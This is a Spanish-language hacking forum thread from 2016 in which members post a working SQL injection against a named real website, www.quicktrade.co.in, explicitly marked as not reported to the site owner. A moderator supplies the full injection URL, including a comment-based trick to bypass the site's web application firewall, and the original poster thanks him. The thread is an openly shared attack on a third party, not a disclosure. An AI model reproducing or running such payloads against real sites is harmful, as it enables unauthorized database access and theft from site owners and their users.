This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

[SQLI] www.quicktrade.co.in

  • 2 Replies
  • 2872 Views

0 Members and 1 Guest are viewing this topic.

Offline ---

  • *
  • Underc0der
  • Posts: 66
  • Actividad:
    0%
  • Reputación 0
    • View Profile

[SQLI] www.quicktrade.co.in

  • on: August 03, 2016, 12:00:04 am
Aburrido y buscando algunas páginas me encontre unas cuantas con fallos..





Link: You are not allowed to view links. Register or Login
Payload: You are not allowed to view links. Register or Login*!00000union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14+--+
Autor: Vasyyyl.
Reportado: No
« Last Edit: August 03, 2016, 08:24:52 am by EPSILON »

Offline EPSILON

  • *
  • Ex-Staff
  • *****
  • Posts: 360
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • [email protected]
    • View Profile

Re:[SQLI]www.quicktrade.co.in

  • on: August 03, 2016, 08:22:56 am
Le falta información al post, no es suficiente con poner una comilla y mandar un pantallazo, tiene que ser completo, te invito a pasar por You are not allowed to view links. Register or Login reglas para saber como postear bien un bug encontrado, te falto el payload o vector de ataque como este:
Code: You are not allowed to view links. Register or Login
http://www.quicktrade.co.in/category_list.php?id=32+/*!00000union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14+--+Incluso la web tiene un waf que hay que bypassear y no lo mencionaste, bueno ya edito el post y agrego lo que falta.

Saludos!, EPSILON

Offline ---

  • *
  • Underc0der
  • Posts: 66
  • Actividad:
    0%
  • Reputación 0
    • View Profile

Re:[SQLI] www.quicktrade.co.in

  • on: August 03, 2016, 11:33:40 am
HOSTIAA es verdad! muchas gracias por añadirlo,se me habia olvidado. En los proximos reportes lo añadiré. Gracias @You are not allowed to view links. Register or Login  ;D